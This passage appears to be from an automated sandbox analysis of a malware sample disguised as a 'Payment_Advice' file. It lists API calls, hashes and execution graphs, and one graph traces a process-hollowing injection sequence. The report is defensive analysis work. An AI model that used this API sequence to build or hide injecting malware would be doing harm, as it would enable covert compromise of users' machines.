                                                      • Instruction ID: 4b0fe6378f6027ada2d8db74ddc61b51f9462678ded80081bad5b8da7f184a0e
                                                      • Opcode Fuzzy Hash: 8d405e1b173177ea89790586d235f10fc7f712f384bf1d367d23111c52829df9
                                                      • Instruction Fuzzy Hash: 11213A71701616ABD7109F2AEC41B56BFE8FF48710F51822AF608E76A1D771E821CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DD70 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • wcslen.MSVCRT ref: 0040DD85
                                                      • RtlAllocateHeap.NTDLL(03410000,00000000,0000000A), ref: 0040DDA9
                                                      • RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,0000000A), ref: 0040DDCD
                                                      • HeapFree.KERNEL32(03410000,00000000), ref: 0040DE04
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Allocate$Freewcslen
                                                      • String ID:
                                                      • API String ID: 584413571-0
                                                      • Opcode ID: e9c6a98fdd6d39e9826194df6834ea9e2ef42813dacce9c02a3e8dca4dd637a1
                                                      • Instruction ID: ec588af85dbfb1d608d0e9eea2fe4ccce556658423514a2897da8941eef92b66
                                                      • Opcode Fuzzy Hash: e9c6a98fdd6d39e9826194df6834ea9e2ef42813dacce9c02a3e8dca4dd637a1
                                                      • Instruction Fuzzy Hash: 1F211574604209EFCB15CF94D884FAABBB9FF49314F108169F9099B384D734EA41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411B20 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040CCF8,00000000), ref: 00411B54
                                                      • malloc.MSVCRT ref: 00411B64
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411B81
                                                      • malloc.MSVCRT ref: 00411B96
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidemalloc
                                                      • String ID:
                                                      • API String ID: 2735977093-0
                                                      • Opcode ID: cd29b8decd3b02952837749b88a0da1641af8608c001b95d219bbc5f6800fa44
                                                      • Instruction ID: 6564459d5a016f80208b608040e38cd36fd424a6541425da5bf10ca2b0b8713f
                                                      • Opcode Fuzzy Hash: cd29b8decd3b02952837749b88a0da1641af8608c001b95d219bbc5f6800fa44
                                                      • Instruction Fuzzy Hash: 180164B734030537E3206655AC42FF7770DCBC1B99F19407AFB005E2C1E6ABA9028679
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411BC0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411BF1
                                                      • malloc.MSVCRT ref: 00411C01
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411C1B
                                                      • malloc.MSVCRT ref: 00411C30
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidemalloc
                                                      • String ID:
                                                      • API String ID: 2735977093-0
                                                      • Opcode ID: 5cf4b8a5cf85d4fe393516ff7cde79f9285f418483ef15bf1e3af7dcf68b9e2c
                                                      • Instruction ID: e896c43596a717bc1e2b0c4b1148b765e438402798fd5a355992862dcf698edd
                                                      • Opcode Fuzzy Hash: 5cf4b8a5cf85d4fe393516ff7cde79f9285f418483ef15bf1e3af7dcf68b9e2c
                                                      • Instruction Fuzzy Hash: F401247B38031137E3205755AC42FA7774DCBC5B99F19447AFB016E2C0EAA7A9018AB8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D0D8 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D0E3
                                                      • RtlReAllocateHeap.NTDLL(00000008,?,?), ref: 0040D123
                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D15E
                                                        • Part of subcall function 0040D7B2: RtlAllocateHeap.NTDLL(00000008,00000000,0040D02C), ref: 0040D7BE
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateCriticalHeapSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3625150316-0
                                                      • Opcode ID: 0a53241ca7917863c4c71313c068b37edaf5ef52ee66f23da44513a19d23a86b
                                                      • Instruction ID: c489c2a9d7d615a57c1fefe1c5f7e248a1051b75451140994bda68c59ab12d69
                                                      • Opcode Fuzzy Hash: 0a53241ca7917863c4c71313c068b37edaf5ef52ee66f23da44513a19d23a86b
                                                      • Instruction Fuzzy Hash: 09112B32600601AFC7209F68EC40E56B7E9EB48321B15892EE596E76A0DB35F844CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D31D Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D32F
                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D5FE,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200), ref: 0040D346
                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D5FE,00000000,00000000,?,00409B28,?,00000200,?,?,00409A2F,00000200), ref: 0040D362
                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D37F
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalFreeHeapSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 1298188129-0
                                                      • Opcode ID: d5ac81aa0c71ad19c1c4e0b2d6939d6c54ec4a5825a3dcbcded4acec7e2d012d
                                                      • Instruction ID: c942d341990db50828fe86b1bb11e7c679014380f0fb6b5d63ada0bd3a9fdac0
                                                      • Opcode Fuzzy Hash: d5ac81aa0c71ad19c1c4e0b2d6939d6c54ec4a5825a3dcbcded4acec7e2d012d
                                                      • Instruction Fuzzy Hash: EB012875A0161AEFC7208F95ED0496BBBACFB08750306813AA814A7614C735F825CFA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004053E4: RtlEnterCriticalSection.NTDLL(00417680), ref: 004053EF
                                                        • Part of subcall function 004053E4: RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405422
                                                      • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405440
                                                      • RtlEnterCriticalSection.NTDLL(00417680), ref: 0040544C
                                                      • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 0040546C
                                                        • Part of subcall function 0040D772: HeapFree.KERNEL32(00000000,?,0040926D,004170C4,00000008,?,?,?,?,00408F50,00000000,00408B2A), ref: 0040D7AB
                                                      • RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405480
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                      • String ID:
                                                      • API String ID: 85618057-0
                                                      • Opcode ID: b1167d0687bed46e093f8ab5fe460e6420eba81e54db401aeab1c784aeeec1fc
                                                      • Instruction ID: c9816872bdd86c647b9bbb3b065009bce871534b551d6c686b05325cb1d870d8
                                                      • Opcode Fuzzy Hash: b1167d0687bed46e093f8ab5fe460e6420eba81e54db401aeab1c784aeeec1fc
                                                      • Instruction Fuzzy Hash: 16F0E232804710EBC6201B65AC48FDBBB78DF44723726883FF94573192C738A8808E6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040937A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040CF28: TlsGetValue.KERNEL32(?,004094C5), ref: 0040CF2F
                                                        • Part of subcall function 0040CF28: RtlAllocateHeap.NTDLL(00000008), ref: 0040CF4A
                                                        • Part of subcall function 0040CF28: TlsSetValue.KERNEL32(00000000,?,?,004094C5), ref: 0040CF59
                                                      • GetCommandLineW.KERNEL32(?,?,?,?,?,?,004094D8,00000000), ref: 00409394
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$AllocateCommandHeapLine
                                                      • String ID: $"
                                                      • API String ID: 565049335-3817095088
                                                      • Opcode ID: fa9a74e3e17bce1985ebad787626fd7ba31f7d8c6f90120e3196dee43f12beff
                                                      • Instruction ID: 69e458bc51ecb7c25a8df227a80145383e7ec16cd8de15c0fb13cda22aad0e48
                                                      • Opcode Fuzzy Hash: fa9a74e3e17bce1985ebad787626fd7ba31f7d8c6f90120e3196dee43f12beff
                                                      • Instruction Fuzzy Hash: 1F31C37250C3218ADB749F54981227733A1EBA1B60F18813FE8926B3C2E3B94D42C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409B0F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00409D5A: memset.MSVCRT ref: 00409DC2
                                                        • Part of subcall function 0040D586: RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D59A
                                                        • Part of subcall function 0040D586: HeapFree.KERNEL32(00000000,?,?,00409B28,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D5E8
                                                        • Part of subcall function 0040D586: RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D5EF
                                                      • HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409B3A
                                                      • HeapFree.KERNEL32(00000000,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B46
                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409B5A
                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,00409A2F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409B70
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                      • String ID:
                                                      • API String ID: 4254243056-0
                                                      • Opcode ID: b07a0de3bc2a029a6d32c3f1ef181170ed56332f7289932ba5d1534fa1d824b7
                                                      • Instruction ID: 705666720bf26b0174e90ab05c41c8e8142486a7e985717f40232ec06a4cc210
                                                      • Opcode Fuzzy Hash: b07a0de3bc2a029a6d32c3f1ef181170ed56332f7289932ba5d1534fa1d824b7
                                                      • Instruction Fuzzy Hash: 36F0C931601515BFC7116B1AFD80D56BFADFF46798352822AB41462631C736FC219AA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      Function 00007FFAACCA33B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1465749796.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffaacca0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction ID: 141d00dcf02e0b8f29e4104d0b8054a5580f9ba0704c2e0073df697dd715e98f
                                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction Fuzzy Hash: 1D01447115CB088FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DA26E882CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:25
                                                      Total number of Limit Nodes:1
                                                      execution_graph 12249 157a968 12251 157a982 12249->12251 12250 157a9d2 12251->12250 12253 157aa28 12251->12253 12254 157aa5b 12253->12254 12273 1579b1c 12254->12273 12256 157ac32 12257 1579b28 Wow64GetThreadContext 12256->12257 12258 157ad2c 12256->12258 12257->12258 12259 1579b40 ReadProcessMemory 12258->12259 12260 157ae0c 12259->12260 12268 157a758 VirtualAllocEx 12260->12268 12261 157af29 12267 157a600 WriteProcessMemory 12261->12267 12262 157b208 12270 157a600 WriteProcessMemory 12262->12270 12263 157b00d 12263->12262 12269 157a600 WriteProcessMemory 12263->12269 12264 157b246 12265 157b32e 12264->12265 12271 157a4d8 Wow64SetThreadContext 12264->12271 12272 157a878 ResumeThread 12265->12272 12266 157b3eb 12266->12251 12267->12263 12268->12261 12269->12263 12270->12264 12271->12265 12272->12266 12274 157b558 CreateProcessW 12273->12274 12276 157b73e 12274->12276

                                                      Executed Functions

                                                      Function 01579B1C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 283 1579b1c-157b5e3 285 157b5e5-157b5f7 283->285 286 157b5fa-157b608 283->286 285->286 287 157b61f-157b65b 286->287 288 157b60a-157b61c 286->288 289 157b66f-157b73c CreateProcessW 287->289 290 157b65d-157b66c 287->290 288->287 294 157b745-157b804 289->294 295 157b73e-157b744 289->295 290->289 305 157b806-157b82f 294->305 306 157b83a-157b845 294->306 295->294 305->306
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0157B729
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: b3f9a9129457d0d3aa3b868523903c0cad127dff11f1e3bf8a83e40ea7105e3a
                                                      • Instruction ID: 5fc9591535a30395c44c81dfea0d120215c81c9bc3e7b0547808be2b4f7a6f61
                                                      • Opcode Fuzzy Hash: b3f9a9129457d0d3aa3b868523903c0cad127dff11f1e3bf8a83e40ea7105e3a
                                                      • Instruction Fuzzy Hash: 0681CF75C002698FDB25CFA9D884BDDBBF5BB09300F1491AAE509B7260EB309A85CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0157A600 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 310 157a600-157a66b 312 157a682-157a6e3 WriteProcessMemory 310->312 313 157a66d-157a67f 310->313 315 157a6e5-157a6eb 312->315 316 157a6ec-157a73e 312->316 313->312 315->316
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157A6D3
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 44a4de7640ba37c76b2da2f782b564b330e166c182780cafba7e1c326abe3c6e
                                                      • Instruction ID: b41f12c7b565fdc41dd49c9e848454e35b3f8e14faff430754d4a54ff99e52c8
                                                      • Opcode Fuzzy Hash: 44a4de7640ba37c76b2da2f782b564b330e166c182780cafba7e1c326abe3c6e
                                                      • Instruction Fuzzy Hash: 0D41CAB4D012589FCF10CFA9D984ADEFBF1BB49310F14902AE819BB240D735AA41CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01579B40 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 321 1579b40-157ba45 ReadProcessMemory 323 157ba47-157ba4d 321->323 324 157ba4e-157ba8c 321->324 323->324
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157BA35
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 2b546869acb12ad15963f315f9a43acd6b379fe1caba31924dfc844d4d966c6c
                                                      • Instruction ID: d3ab5d80d3b3b944703677869748bfdef55c341d0e70c8d1df3e35559adc9165
                                                      • Opcode Fuzzy Hash: 2b546869acb12ad15963f315f9a43acd6b379fe1caba31924dfc844d4d966c6c
                                                      • Instruction Fuzzy Hash: DF4177B9D042589FCF10DFAAE984ADEFBB1BB19310F10902AE814BB210D375A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0157A758 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 327 157a758-157a812 VirtualAllocEx 330 157a814-157a81a 327->330 331 157a81b-157a865 327->331 330->331
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0157A802
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 7517d2de4889325f635aea36db0a4c9aa6cef213428cf456928853b1a0e65dd6
                                                      • Instruction ID: 3ed258743b3480573dc9668baa83987f1680b7464cadf893e54ea7ba54caeeb4
                                                      • Opcode Fuzzy Hash: 7517d2de4889325f635aea36db0a4c9aa6cef213428cf456928853b1a0e65dd6
                                                      • Instruction Fuzzy Hash: 883198B8D002589FCF10CFA9D985ADEFBB1BB49310F14942AE815BB310D735A902CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0157A4D8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 336 157a4d8-157a538 338 157a54f-157a597 Wow64SetThreadContext 336->338 339 157a53a-157a54c 336->339 341 157a5a0-157a5ec 338->341 342 157a599-157a59f 338->342 339->338 342->341
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0157A587
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: cb4014c715cc67653ea7134b084d2ec537687493dcd3fc3e07dc013ef7624497
                                                      • Instruction ID: 936b35e48ea32821ab25f6de336c7baf98c4e9e9795110ff8efdb9e4eb3ec0f7
                                                      • Opcode Fuzzy Hash: cb4014c715cc67653ea7134b084d2ec537687493dcd3fc3e07dc013ef7624497
                                                      • Instruction Fuzzy Hash: E931BBB4D012589FDF14DFAAD885AEEFBF1BB49310F14802AE415BB240D738A945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01579B28 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 347 1579b28-157b8d4 349 157b8d6-157b8e8 347->349 350 157b8eb-157b932 Wow64GetThreadContext 347->350 349->350 351 157b934-157b93a 350->351 352 157b93b-157b973 350->352 351->352
                                                      APIs
                                                      • Wow64GetThreadContext.KERNEL32(?,?), ref: 0157B922
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 38514ce5738f674b4c78cd85b9729852e7477e08ec3177ab1b0a28ebce7b152a
                                                      • Instruction ID: 8644220b25f7eedff44bb985e05f56178e7fb56779f8f785c78e0e3a0078ccf8
                                                      • Opcode Fuzzy Hash: 38514ce5738f674b4c78cd85b9729852e7477e08ec3177ab1b0a28ebce7b152a
                                                      • Instruction Fuzzy Hash: A631ABB5D012589FCB10CFAAE485AEEFBF1BB08314F14902AE418BB350D378A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0157A878 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 355 157a878-157a906 ResumeThread 358 157a90f-157a951 355->358 359 157a908-157a90e 355->359 359->358
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0157A8F6
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 77c273a9a0023fcca4bb5698e5d9dc92d1862ebfc97516a8a1c0cc8764339ea4
                                                      • Instruction ID: f47aa2e7d45e2c4418fc9f82ad9963c5b77d1babc3614fc5d3071ac430fcff0e
                                                      • Opcode Fuzzy Hash: 77c273a9a0023fcca4bb5698e5d9dc92d1862ebfc97516a8a1c0cc8764339ea4
                                                      • Instruction Fuzzy Hash: 5131AAB4D013189FDB24CFAAE885A9EFBF5BB49310F14942AE815B7340D735A902CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111D5B8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1412369316.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_111d000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e90dbda22ba9a1a2a14769e263c08977c163c1c2d1a739aeeac06aee475406c6
                                                      • Instruction ID: 95c816adaf4f9aaedfdfc75b97680b5f9f3ff34d015045fe496e2781c71a463e
                                                      • Opcode Fuzzy Hash: e90dbda22ba9a1a2a14769e263c08977c163c1c2d1a739aeeac06aee475406c6
                                                      • Instruction Fuzzy Hash: F12103B1504200DFDF19DF54E9C8B16FF65FB84324F208979E8090B24AC336D456CAA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111D5B3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1412369316.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_111d000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction ID: f91dfb1285eeb5338708913e5bb3c2b49cbabc144312c08a3746ae33ffb31f83
                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction Fuzzy Hash: 9411AF76504240CFCF1ACF54D9C4B16FF62FB84324F2486A9D8090B25BC336D456CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:14.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:52
                                                      Total number of Limit Nodes:9
                                                      execution_graph 18921 1661e70 18923 1661ea1 18921->18923 18924 1661eed 18921->18924 18922 1661ead 18923->18922 18927 16620e8 18923->18927 18931 16620d9 18923->18931 18936 1662128 18927->18936 18948 1662118 18927->18948 18928 16620f2 18928->18924 18932 16620e8 18931->18932 18934 1662128 3 API calls 18932->18934 18935 1662118 3 API calls 18932->18935 18933 16620f2 18933->18924 18934->18933 18935->18933 18937 1662139 18936->18937 18938 166215c 18936->18938 18937->18938 18946 1662128 2 API calls 18937->18946 18947 1662118 2 API calls 18937->18947 18938->18928 18939 1662154 18939->18938 18940 166237d LoadLibraryExW 18939->18940 18943 1662312 18939->18943 18942 16623f1 18940->18942 18942->18928 18944 1662351 18943->18944 18960 16610e8 18943->18960 18944->18928 18946->18939 18947->18939 18949 1662128 18948->18949 18950 166215c 18949->18950 18958 1662128 2 API calls 18949->18958 18959 1662118 2 API calls 18949->18959 18950->18928 18951 1662154 18951->18950 18952 166237d LoadLibraryExW 18951->18952 18955 1662312 18951->18955 18954 16623f1 18952->18954 18954->18928 18956 1662351 18955->18956 18957 16610e8 LoadLibraryExW 18955->18957 18956->18928 18957->18956 18958->18951 18959->18951 18962 1662378 LoadLibraryExW 18960->18962 18963 16623f1 18962->18963 18963->18944 18964 1665e30 18965 1666138 18964->18965 18966 1665e58 18964->18966 18967 1665e61 18966->18967 18970 16652d4 18966->18970 18969 1665e84 18971 16652df 18970->18971 18972 166617b 18971->18972 18974 16652f0 18971->18974 18972->18969 18975 16661b0 OleInitialize 18974->18975 18976 1666212 18975->18976 18976->18972 18914 16663c8 18916 166642d 18914->18916 18915 166647a 18916->18915 18918 166539c 18916->18918 18919 1667490 DispatchMessageW 18918->18919 18920 16674fc 18919->18920 18920->18916

                                                      Executed Functions

                                                      Function 0177B388 Relevance: 6.6, Strings: 5, Instructions: 345COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
